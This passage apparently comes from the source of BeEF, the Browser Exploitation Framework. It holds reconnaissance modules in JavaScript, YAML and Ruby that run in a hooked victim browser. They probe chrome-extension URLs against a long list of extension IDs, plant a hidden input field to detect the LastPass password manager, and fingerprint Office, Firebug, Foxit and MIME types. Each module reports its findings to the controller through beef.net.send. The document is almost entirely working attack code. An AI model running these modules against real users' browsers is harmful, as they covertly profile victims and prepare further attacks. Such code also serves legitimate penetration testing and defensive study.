new Array("lpnflgjnaodohepcidmeajmnognomdac","Shooting Games"),
new Array("odncdkhnnoclkbomkbflglagdibfeede","\u82f1\u8f9e\u90ce on the WEB Pro"),
new Array("geigdllbfbaahjmlnjpccakpdfbgmlel","Monster Mowdown"),
new Array("oddhbkghjoccbljmagcgoklbfdjeiinb","Minimalist for Gmail\u2122 (DEPRECATED!)"),
new Array("bfmbadcfdhiklafcdohpfphhhakmiakk","Google Groups"),
new Array("fjbdgmikfnklbopkafjgbcejoiipemkl","Cultures Online"),
new Array("aahdmajpnpehigpjimeikadfnmoadbff","Happy Old Miner"),
new Array("nbbplhlbacnmbelnhihijjkoelfodjdc","FlyOrDie Chess"),
new Array("nmkbaaijgpppbokgnhhoakihofedkgcc","MuteTab"),
new Array("ihamlfilbdodiokndlfmmlpjlnopaobi","Pretty Facebook Chat"),
new Array("eoaodigphofcbomacfoknjlbpnhoifjc","Monster Island"),
new Array("nioihlfoddilijjjeknopfcbglallkce","QR Image from URL"),
new Array("jfpdnkkdgghlpdgldicfgnnnkhdfhocg","Spell Checker for Chrome"),
new Array("hccbinpobnjcpckmcfngmdpnbnjpmcbd","AppJump App Launcher and Organizer"),
new Array("ffjojpammnplfpppjcicjjkkigafkmmj","star war (3D)"),
new Array("lilnjkiphkngmaklmlngobfodmhdhaho","Prism Puzzle 2"),
new Array("bjcgpdkighmjfjlplcighhgamlhkimce","YouZeeK"),
new Array("gchpchgegkdmbbhdikfmplpllehnfnmk","GGOAL"),
new Array("phocfhaegibfmggagffipgngifmjjdno","Canvas Life"),
new Array("aglfgpioobpcmdheljepehachdjeopad","Learn German - Wie Geht's"),
new Array("caampdmalollkcdgdiilgpimcbfjfmoe","Facebook Me-Gusta Button"),
new Array("binjiceocgbfooocmheaenmmcominbpe","JoinTabs"),
new Array("keahandkkpofilglbkogbgdboknaonhh","\u5929\u6daf\u52a9\u624b"),
new Array("dapjbgnjinbpoindlpdmhochffioedbn","BuiltWith Technology Profiler"),
new Array("edibjaleplmkklgdabaddfombdbcafek","3D Racing"),
new Array("nddpmdmpdcbnnkjfplckngdkhhmmbjaf","Sumon"),
new Array("mdoongfaplfcbdmoemnnehfcpbnmcdpi","Call of Gods"),
new Array("elkkomimknapgodalnkjeddkjnjkfmfp","ScribeFire"),
new Array("achiaajeohjhddijekccekdhmmbogahe","Chit Chat City"),
new Array("opdgckbdimehmjcfoddoghjieapefide","FitnessBliss"),
new Array("dafaiapjnboakngjebdcgbaabglhjego","Juventus Social Wall"),
new Array("mdlcpliloefkecimeagemfninoihnfig","Goodfon Wallpapers"),
new Array("mhgknbehalhkedjgfhiaindklahhkccc","Date Today"),
new Array("jgdeoagndhabdnoenpdcagbkkmjeibmh","Pixect"),
new Array("imfaefgciinakhhijicamiodfbejphdb","RePlay.FR"),
new Array("cepeknpdbndaejpbnmnkfdnadghpekmo","Battle Dawn"),
new Array("ggfhpfknhaooigghmnblblanmmioiepn","Under Arms"),
new Array("opmjilhagjcljjfhognaphkplgnodmha","Battleships"),
new Array("oocnpgmgogaghamiaanioelohaeohijp","Way of an Idea"),
new Array("pidjpfnhaidmahnblgikaaadclebmoio","Appie"),
new Array("kbpdgcemjmjhgnphmehjhnbhjbgjleka","Ripples"),
new Array("febjffjimfjehaekdkniojehjngaeajf","TwitterWatch - Real Time Twitter Update"),
new Array("fjmhjjohhiehaoljianalpmfcceojaff","Service Pages for Google Chrome\u2122"),
new Array("bfdjglobiolninfgldchakgfldifphic","QRreader beta"),
new Array("efjnmljhhgladbahmmaigjjolibeafdc","ESPN"),
new Array("akbhffdipdbpbljpigineiocenlilegd","Pac-xon"),
new Array("gkkagmljmjdilndhenjikgdnebcpfkfo","Chikka"),
new Array("adcnghffffopmjobbaabboiflpcchljd","Sandglaz"),
new Array("calghnejjfdjcalcfiemkckmbfkconee","Ultimate Cricket"),
new Array("imnghiiajfangdaolekmphkaohhcnklj","Save to Pulse"),
new Array("deegloljmdbfbjhlimieancmcfombgjj","Good Noows"),
new Array("aelbbmmnbhhejifmacegolomcmdggnfc","GardenPuzzle - Garden Planner"),
new Array("gefphpbilnknofmmmjlgekgeclgajehk","Any New Books"),
new Array("mgmiemnjjchgkmgbeljfocdjjnpjnmcg","Awesome New Tab Page"),
new Array("pjooepcgnnoappldfldmnnnjpaopdblo","Universal Music"),
new Array("gflibdiphnaciliajaeahdjoodibmbjb","Papa's Freezeria"),
new Array("fajaoajlncmbolmpccmibgjpgmiilbfe","Toast Snatcher"),
new Array("ofoaoaloeipdofknnaapbmdddddioklg","SEO SERP"),
new Array("jaofpdcblhcphmliigaphljgfibghldn","Like.fm"),
new Array("dmhidcnieiplicmhimkbfpiledfbdodo","Al Jazeera English"),
new Array("ibjjkgadefcajphiihhlbagkkcfnhcij","Big Snow Tricks"),
new Array("nnkeklmkmolipcclpncndnpdgilieafl","stern.de"),
new Array("kohieaegcicdnaabkagajpanjakhekkb","Sports Games Collection"),
new Array("pjlflpphgcocgjlmobgjbfneoemlbmlc","Gravity Guy"),
new Array("mlbpknobcopmnlganinccihoafiblkne","War of Legends"),
new Array("iggmbjghgeahcopdibklblgfkfendefg","NOS Video"),
new Array("pnengefjfhgcceajaepbjhanoojifmog","Writer"),
new Array("gpamkbhofeehomgnflocnjjcmcfibone","Google Project Hosting"),
new Array("nlaohibjpbalcmbphaombidlahpndkdm","Whack a Mole"),
new Array("fhegpdplcdokjeaeibbjgjcgmmadgncb","Radio 105"),
new Array("daaehkjmdmodknldpplikflminiicfal","Bubble Cupid"),
new Array("mfoffpkeihdlakgoebapjamipbkbgmpi","Tennis Doubles - 3D"),
new Array("icojacdaddlajldkicfacgcjncbkieen","Pool Mania"),
new Array("mlbnpnlmfngmlcmkhjpbfokdphfehhjj","ruul. Screen ruler"),
new Array("peconnficnlajdpgfcjfmhjibkoijlbp","G-calize"),
new Array("dofcilnakjpenampigbefbbeekanbfgl","Douban Pulse"),
new Array("djlnllmnlolplmikofclonjoehopgffj","Radio stations from Argentina"),
new Array("fboiibgbjljogjkebjcfhggbiponmpkk","Chrome Voice Control"),
new Array("ogbnemfckmdpkeeccieeahplnemmbcfg","Floor Plan Creator"),
new Array("jadajphjladhhmcjiomkmlihlknbnicc","YourNextFilm"),
new Array("gkpcjgifmcccnfhonphppaikdkamkdgp","The World Smiling"),
new Array("mcojpamlhfgicdibfhfpfaialnlaghbi","Mr MothBall "),
new Array("pfagmcegbaeelbnibmipibkmigipedmk","Elfster"),
new Array("imdilajngppdgdbemeighbingnbmpnpl","Faerie Alchemy HD"),
new Array("pggaepdghiamdelgbgolfggheakmdgon","Falling Sand "),
new Array("jepniedfbdhmplhbjffedeomcaopopob","Pursuit of Hat"),
new Array("dljdanmclaloibaplofjjljkamhdofmg","Doremi"),
new Array("mhaphfncflglmofajgmhlgekgkjefiae","vox.io"),
new Array("foloenejobmljmemkomjcofkdjdnkggn","Radios do Brasil"),
new Array("ekmnknlahnpppljnjacdbpnlpbkckcki","FlyOrDie Four in a Row"),
new Array("aifpigcngkjdlbkjmkmhkhmhaepoielk","Learn European Languages (FREE VERSION)"),
new Array("apdiogojbmdncjdpljocafnigiokgmci","UJAM - Make your music. Be heard."),
new Array("hljnlfolmbmibdjaikiaepgepgnldclj","Simple Highlighter"),
new Array("ofgppnjcdndocgicmodblmfmbdibefbm","\u8c46\u74e3FM \u7cbe\u7f8e\u7248"),
new Array("aomjekmpappghadlogpigifkghlmebjk","Speech Recognizer"),
new Array("ienibllimcjfdingpoihjipomkjnpial","Warzone Tower Defense"),
new Array("jbmoechgcbcngboikkfiojlnefcgjepp","YourNextRead"),
new Array("ojflnhjodgafkhbmblnpkkaomffojpca","The Impossible Quiz"),
new Array("klicmgamjpclmbhppmdeamffedflmkcn","Sand 2"),
new Array("jemlklgaibiijojffihnhieihhagocma","SingleFile Core"),
new Array("mbnhjlkenpmankjjbbolibfcghileiae","Like.fm Music Profile"),
new Array("jldhpllghnbhlbpcmnajkpdmadaolakh","Todoist: To-Do list and Task Manager"),
new Array("lnempicjilmahngopecohbcbldlijkib","Mappeo"),
new Array("ggpeehmipebgblgaokenepkkinmbnipa","NASA Online TV HD"),
new Array("occfbdbgdodefnegmkafdlebmmifikkn","Rally Expert"),
new Array("bjbjfcgehjgipnpgfdnlbodhildpafdf","Dog Hotel"),
new Array("icncamkooinmbehmkeilcccmoljfkdhp","Wolfram|Alpha (Official)"),
new Array("fogikklcokfgmlhjgkgaiehnjdodahbb","Fancy Pants Adventure: World 2"),
new Array("ccmmgijadofegbfojekdglknbeeminej","\u0442\u0435\u043b\u0435\u0432\u0438\u0437\u043e\u0440"),
new Array("napaodofbddcgpbgepkedckklhcmpilc","Flight 3D Aerobatics Training"),
new Array("hiikfoplnkjhoiafgmcobenlfnbphbee","WarLight"),
new Array("mmennkmmgljpjeihfakkbfadfbbfapgm","Formula 3D"),
new Array("pmjcjgbbfaajnfohkokpemdcepngehjg","Pac Man Classic"),
new Array("kkmlkkjojmombglmlpbpapmhcaljjkde","Zhongwen: A Chinese-English Popup Dictionary"),
new Array("knnkddolkkmempomngnbeifoijaokkom","Aviary Color Editor"),
new Array("poehiocknllbldkbpcncbgdafeeaojek","Football Volley Challenge"),
new Array("nijhigeigjmbjpmhelkmfabiaogaplkd","Math Lab"),
new Array("megglpjmadjmghjegnallnhiknjnnjhh","Guitar Chords"),
new Array("llpeeehacmdheefdajbainfmpanommnd","Guia da Semana"),
new Array("abmmkpmdgmnegiciliebkdafhgdaklkl","Volagratis Pilot"),
new Array("eiidclgejnacldolfgpiiffbpapdpfji","ibibo Rummy"),
new Array("clbjclclcokdnbfkhnmiocjcjmdeoeaj","Wikipedia SSL"),
new Array("lmgkpnbfgimlalkolndeccanfnbpogcd","Solve a Cipher!"),
new Array("ncccpckadclahjkmlemjbakodaaaemig","Dragon Age Legends"),
new Array("bjackipnjjjefeppmpbgcdefaplneopj","MyNetDiary Calorie Counter and Food Diary"),
new Array("mkamfeggnihmfbmbidpdmkapjenacmdc","Prince Of Persia"),
new Array("ballhmoamkbbfadiealjmgmhbbnellbc","Toodledo Tasks"),
new Array("liamajdghafnpofaconeimppimbdbhgi","Send to Instapaper"),
new Array("mjkbgbnoikoflalnbnofkfegidffigke","Yoono WebApp"),
new Array("ohncmadoekkdmccmbemflhfjogbpjigc","Hotel Finder by Amazebuy"),
new Array("hnldbiikfjheppkbnjbnkgimnfejifpf","Oogle"),
new Array("gcolaeigjaencllpclbijidbadgkdfde","Orkut Main Kill"),
new Array("jdihnhedcafgpbbbbiohamlkbbjlifdb","Math Motorway"),
new Array("oiabhgfgfhoilflkoicbmnejgjjfmhcg","Photo Collage"),
new Array("odlofbgmekaiejbmlpnnlfaamehffedb","Mike Shadow - I paid for it!"),
new Array("lpnmkolabeomngkkeljdkgnakemkcckm","Hidden Object Games Online"),
new Array("kfoaifmljjopjdffohdndabjeejbnipm","Emqualcinema"),
new Array("ljpaikmjlpddojgcoaejihgoneamafap","Bloons 2"),
new Array("dkpacaoamfanlmkfcalnbbcdbmfcmclf","PocketSmith - Cashflow Forecasting"),
new Array("mcbpblocgmgfnpjjppndjkmgjaogfceg","FireShot: Quick Captures and Annotations"),
new Array("hbenbgblhhlecmfechhfecgioakobfdl","Guitar Tuner"),
new Array("cdliblldgjdficcbflpdknckckdfdkbo","Shogun's Fate"),
new Array("iakncpcejjmfmplodgimgpkhlclagncg","Wlingua - Curso de ingl\u00e9s"),
new Array("eocaeafeojdmijlfeheaeabellldmbcc","Monster Jobs"),
new Array("hgknnkhbpkjmdfhjhpchcijdjjeajalp","Valentine Mahjong"),
new Array("jhegddohmncgelkehhnigphmloinkinj","Zoho Sheet"),
new Array("ebojakelgejdogaleoeoaadjpefeifen","Mail Checker Minus (Beta)"),
new Array("homldgnlpldcmdflhnabedgkgpmeanhd","Tweet Button for Chrome (by Shareaholic)"),
new Array("hjcccdngnaailhnoflbeficiokgcfaah","Pearltrees"),
new Array("chfghejgpdfifblfijbhnhgnhpmchpom","Google Plus Directory"),
new Array("lganibdddhhoohdchmljgclacnfnkfgb","World Digital Library - UNESCO"),
new Array("ndfkfbdpnknippjjpkdoiadggmohdpfg","Ace Pilots"),
new Array("ddjklapimfghfjjinidpblloipjnnpgb","+Music"),
new Array("deonblningjbcdgiidohkfhajiinphah","USA Streets"),
new Array("nhhdgipkbgjblbgjlbakfffjbffpdblo","FlyOrDie Gomoku"),
new Array("celkoncipomnbmcomjieepceifpcdgdl","StoryLines"),
new Array("nmgcfdmgcfldfkehdgoancleciikdlnf","DeskSMS - Send and Receive Texts Messages"),
new Array("kfjkehmceppcpjoaoegdmffmkdhiegmc","Pinterest Pin It Button (by Shareaholic)"),
new Array("epdnnopdcceagfjiicjceffncileogdn","Virgin Radio Italy"),
new Array("egnlbiigfcfmheinfklfonfgollmjkgc","INFO Lab"),
new Array("bigbpmgpdffelbefknlmefjiejgoinao","Rage Comics"),
new Array("mghenlmbmjcpehccoangkdpagbcbkdpc","Session Manager"),
new Array("femogenllijpkfbckgkllmiekhjipene","\u4ea6\u6b4c"),
new Array("pnmeglpffblgeibddiihnafkihmkleje","Aztec Drop"),
new Array("ikijikcfedekifbolhamdccnhnlkhfpf","TheDeadline"),
new Array("lkobmjibnppfleogmodpjgocgdbdiikp","WarTime"),
new Array("inolmjbojghkehmmlbdmpdlmagalddni","Jagran - India No.1 Hindi News Daily")
);
var firefox_extensions = {
"Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png",
"Auto Copy" : "chrome://autocopy/skin/autocopy.png",
"ColorZilla" : "chrome://colorzilla/skin/logo.png",
"Customize Google" : "chrome://customizegoogle/skin/32x32.png",
"DownThemAll!" : "chrome://dta/content/immagini/icon.png",
"Faster Fox" : "chrome://fasterfox/skin/icon.png",
"Flash Block" : "chrome://flashblock/skin/flash-on-24.png",
"FlashGot" : "chrome://flashgot/skin/icon32.png",
"Forecastfox" : "chrome://forecastfox/skin/images/icon.png",
"Google Toolbar" : "chrome://google-toolbar/skin/icon.png",
"Greasemonkey" : "chrome://greasemonkey/content/status_on.gif",
"IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png",
"IE View" : "chrome://ieview/skin/ieview-icon.png",
"JS View" : "chrome://jsview/skin/jsview.gif",
"Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png",
"MeasureIt" : "chrome://measureit/skin/measureit.png",
"SEO For Firefox" : "chrome://seo4firefox/content/icon32.png",
"SEOpen" : "chrome://seopen/skin/seopen.png",
"Search Status" : "chrome://searchstatus/skin/cax10.png",
"Server Switcher" : "chrome://switcher/skin/icon.png",
"StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png",
"Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png",
"Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png",
"User Agent Switcher" : "chrome://useragentswitcher/content/logo.png",
"View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png",
"Web Developer" : "chrome://webdeveloper/content/images/logo.png",
"Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png",
"UrlParams" : "chrome://urlparams/skin/urlparams32.png",
"NewsFox" : "chrome://newsfox/skin/images/home.png",
"Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png",
"GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png",
"QuickJava" : "chrome://quickjava/content/js.png",
"Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png",
"BBCode" : "chrome://bbcode/skin/bbcode.png",
"BugMeNot" : "chrome://bugmenot/skin/bugmenot.png",
"ConQuery" : "chrome://conquery/skin/conquery.png",
"Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png",
"Extended Cookie Manager" : "chrome://xcm/content/allowed.png",
"FireBug" : "chrome://firebug/content/firebug32.png",
"FoxyTunes" : "chrome://foxytunes/skin/logo.png",
"MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png",
"SessionSaver .2" : "chrome://sessionsaver/content/ss.png",
"spooFX" : "chrome://spoofx/skin/main/spoofx.png",
"Statusbar Clock" : "chrome://timestatus/skin/icon.png",
"Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png",
"UnPlug" : "chrome://unplug/skin/unplug.png",
"View Source Chart" : "chrome://vrs/skin/vrssmall.png",
"XPather" : "chrome://xpather/content/iconka.png",
"WOT" : "chrome://wot/skin/fusion/logo.png",
"LastPass" : "chrome://lastpass/skin/vaultdelete.png",
};
var failed = false;
var detect_chrome_extension = function(addon_id, addon_name) {
if (failed) {
return false;
}
var s = document.createElement('script');
s.onload = function() {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension='+addon_name);
}
s.onerror = function() {
throw 'detect_chrome_extension';
}
s.src = 'chrome-extension://' + addon_id + '/manifest.json';
document.body.appendChild(s);
}
var detect_firefox_extension = function(addon_url, addon_name) {
if (failed) {
return false;
}
var img = document.createElement("img");
img.setAttribute("border", '0');
img.setAttribute("width", '0');
img.setAttribute("height", '0');
img.setAttribute("onload", "beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension=" + addon_name+ "');");
img.setAttribute('onerror', 'throw "detect_firefox_extension"');
img.setAttribute("src", addon_url);
}
if(beef.browser.isC()) {
try {
window.onerror = function (e) {
if (!failed) {
failed = true;
if (e.indexOf("detect_chrome_extension") != -1) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed', beef.are.status_error());
}
}
};
for (var i=0; i<chrome_extensions.length; i++) {
detect_chrome_extension(chrome_extensions[i][0], chrome_extensions[i][1]);
}
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed', beef.are.status_error());
}
} else if(beef.browser.isFF()) {
try {
window.onerror = function (e) {
if (!failed) {
failed = true;
if (e.indexOf("detect_firefox_extension") != -1) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed', beef.are.status_error());
}
}
};
for (var i in firefox_extensions) {
detect_firefox_extension(firefox_extensions[i], i);
}
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed', beef.are.status_error());
}
} else {
beef.debug('[Detect Extensions] Unspported browser');
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=unsupported browser', beef.are.status_error());
}
}); |
YAML | beef/modules/browser/detect_extensions/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_extensions:
enable: true
category: "Browser"
name: "Detect Extensions"
description: "This module detects extensions installed in Google Chrome and Mozilla Firefox."
authors: ["koto", "bcoles", "nbblrr"]
target:
working:
FF:
min_ver: 1
max_ver: 50
C:
min_ver: 1
max_ver: 18
not_working: ["All"] |
Ruby | beef/modules/browser/detect_extensions/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# More info:
# http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
# http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html
#
class Detect_extensions < BeEF::Core::Command
def post_execute
content = {}
content['extension'] = @datastore['extension']
save content
end
end |
JavaScript | beef/modules/browser/detect_firebug/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = "Not in use or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
}); |
YAML | beef/modules/browser/detect_firebug/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_firebug:
enable: true
category: "Browser"
name: "Detect FireBug"
description: "This module checks if the Mozilla Firefox Firebug extension is being use to inspect the current window."
authors: ["bcoles"]
target:
working: ["FF"]
not_working: ["All"] |
Ruby | beef/modules/browser/detect_firebug/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_firebug < BeEF::Core::Command
def post_execute
content = {}
content['firebug'] = @datastore['firebug'] unless @datastore['firebug'].nil?
save content
end
end |
JavaScript | beef/modules/browser/detect_foxit/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasFoxit() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "foxit="+result);
}); |
YAML | beef/modules/browser/detect_foxit/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_foxit:
enable: true
category: "Browser"
name: "Detect Foxit Reader"
description: "This module will check if the browser has Foxit Reader Plugin."
authors: ["javuto"]
target:
working: ["All"] |
Ruby | beef/modules/browser/detect_foxit/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_foxit < BeEF::Core::Command
def post_execute
content = {}
content['foxit'] = @datastore['foxit']
save content
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasFoxit', Regexp.last_match(1)) if @datastore['results'] =~ /^foxit=(Yes|No)/
end
end |
JavaScript | beef/modules/browser/detect_lastpass/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function () {
var result = "Not in use or not installed";
// The following base64 encoded string represents the LastPass inline PNG which is inserted into user/pass form fields
var base64PNG = "iVBORw0KGgoAAAANSUhEUgAAABAAAAASCAYAAABSO15qAAAAAXNSR0IArs4c6QAAAPhJREFUOBHlU70KgzAQPlMhEvoQTg6OPoOjT+JWOnRqkUKHgqWP4OQbOPokTk6OTkVULNSLVc62oJmbIdzd95NcuGjX2/3YVI/Ts+t0WLE2ut5xsQ0O+90F6UxFjAI8qNcEGONia08e6MNONYwCS7EQAizLmtGUDEzTBNd1fxsYhjEBnHPQNG3KKTYV34F8ec/zwHEciOMYyrIE3/ehKAqIoggo9inGXKmFXwbyBkmSQJqmUNe15IRhCG3byphitm1/eUzDM4qR0TTNjEixGdAnSi3keS5vSk2UDKqqgizLqB4YzvassiKhGtZ/jDMtLOnHz7TE+yf8BaDZXA509yeBAAAAAElFTkSuQmCC";
let createInputField = function () {
beef.debug("Module - Detect LastPass: Generating input field");
return new Promise((resolve, reject) => {
var input = document.createElement("input");
input.type = "text";
input.id = "username";
input.name = "username";
input.setAttribute("style", "display:none;position:absolute;visibility:hidden;top:-1000px;left:-1000px;border:none;");
document.body.appendChild(input);
beef.debug("Module - Detect LastPass: Input field generated");
// FF requires some interaction to trigger extension function, so we use a timeout to wait 5 seconds in the hope that a user interacts
if (beef.browser.isFF()) {
setTimeout(() => {
resolve();
}, 5000);
} else {
// `1 second timout to allow DOM to update
setTimeout(() => {
resolve();
}, 1000);
}
})
}
let detectLastPass = function () {
beef.debug("Module - Detect LastPass: Looking for input field");
return new Promise((resolve, reject) => {
// Detect input form fields with the injected LastPass PNG as background image
var bginput = $j('input[style]');
var lpdiv = document.getElementById('hiddenlpsubmitdiv');
if (bginput.length > 0) {
beef.debug("Module - Detect LastPass: Input field with 'style' attribute found: " + bginput);
for (var i = 0; i < bginput.length; i++) {
beef.debug("Module - Detect LastPass: Number of potential input fields with 'style' attribute found: " + bginput.length);
var styleContent = bginput[i].getAttribute('style');
if (styleContent.includes(base64PNG)) {
beef.debug('Module - Detect LastPass: Matching inline PNG detected');
result = "Detected LastPass through presence of inline base64-encoded PNG within input form field";
}
}
// Detect presence of LastPass iframe
} else if ($j("iframe[name='LPFrame']").length > 0) {
beef.debug('Module - Detect LastPass: Matching iframe found');
result = "Detected LastPass through presence of LastPass 'save password' iframe";
// Below is the older method of LastPass detection method
} else if (typeof (lpdiv) != 'undefined' && lpdiv != null) {
result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
} else if ($j("script:contains(lastpass_iter)").length > 0) {
result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
}
resolve();
})
}
function getResult() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass=" + result);
}
createInputField().then(detectLastPass).then(getResult);
}); |
YAML | beef/modules/browser/detect_lastpass/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_lastpass:
enable: true
category: "Browser"
name: "Detect LastPass"
description: "This module checks if the LastPass extension is installed and active."
authors: ["xntrik","DeezyE"]
target:
not_working: ["IE"]
working: ["All"] |
Ruby | beef/modules/browser/detect_lastpass/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_lastpass < BeEF::Core::Command
def post_execute
content = {}
content['lastpass'] = @datastore['lastpass'] unless @datastore['lastpass'].nil?
save content
end
end |
JavaScript | beef/modules/browser/detect_mime_types/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
if (navigator.mimeTypes) {
var mime_types = JSON.stringify(navigator.mimeTypes);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "mime_types=" + mime_types, beef.are.status_success());
beef.debug("[Detect MIME Types] " + mime_types);
} else {
beef.debug("[Detect MIME Types] Could not retrieve supported MIME types");
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'fail=Could not retrieve supported MIME types', beef.are.status_error());
}
}); |
YAML | beef/modules/browser/detect_mime_types/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_mime_types:
enable: true
category: "Browser"
name: "Detect MIME Types"
description: "This module retrieves the browser's supported MIME types."
authors: ["bcoles"]
target:
working: ["All"]
not_working: ["IE"] |
Ruby | beef/modules/browser/detect_mime_types/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_mime_types < BeEF::Core::Command
def post_execute
content = {}
content['mime_types'] = @datastore['mime_types'] unless @datastore['mime_types'].nil?
save content
end
end |
JavaScript | beef/modules/browser/detect_office/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var ma = 1;
var mb = 1;
var mc = 1;
var md = 1;
try {
ma = new ActiveXObject("SharePoint.OpenDocuments.4")
} catch (e) {}
try {
mb = new ActiveXObject("SharePoint.OpenDocuments.3")
} catch (e) {}
try {
mc = new ActiveXObject("SharePoint.OpenDocuments.2")
} catch (e) {}
try {
md = new ActiveXObject("SharePoint.OpenDocuments.1")
} catch (e) {}
var a = typeof ma;
var b = typeof mb;
var c = typeof mc;
var d = typeof md;
var key = "No Office Found";
if (a == "object" && b == "object" && c == "object" && d == "object") {
key = "Office 2010"
}
if (a == "number" && b == "object" && c == "object" && d == "object") {
key = "Office 2007"
}
if (a == "number" && b == "number" && c == "object" && d == "object") {
key = "Office 2003"
}
if (a == "number" && b == "number" && c == "number" && d == "object") {
key = "Office Xp"
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
}); |
YAML | beef/modules/browser/detect_office/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_office:
enable: true
category: "Browser"
name: "Detect MS Office"
description: "This module detect the version of MS Office if installed"
authors: ["nbblrr"]
target:
working: ["IE"]
not_working: ["All"] |
Ruby | beef/modules/browser/detect_office/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_office < BeEF::Core::Command
def post_execute
content = {}
content['office'] = @datastore['office']
save content
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasOffice', Regexp.last_match(1)) if @datastore['results'] =~ /^office=Office (\d+|Xp)/
end
end |
JavaScript | beef/modules/browser/detect_popup_blocker/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "popup_blocker_enabled="+beef.browser.popup.blocker_enabled());
}); |
YAML | beef/modules/browser/detect_popup_blocker/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_popup_blocker:
enable: true
category: "Browser"
name: "Detect Popup Blocker"
description: "Detect if popup blocker is enabled."
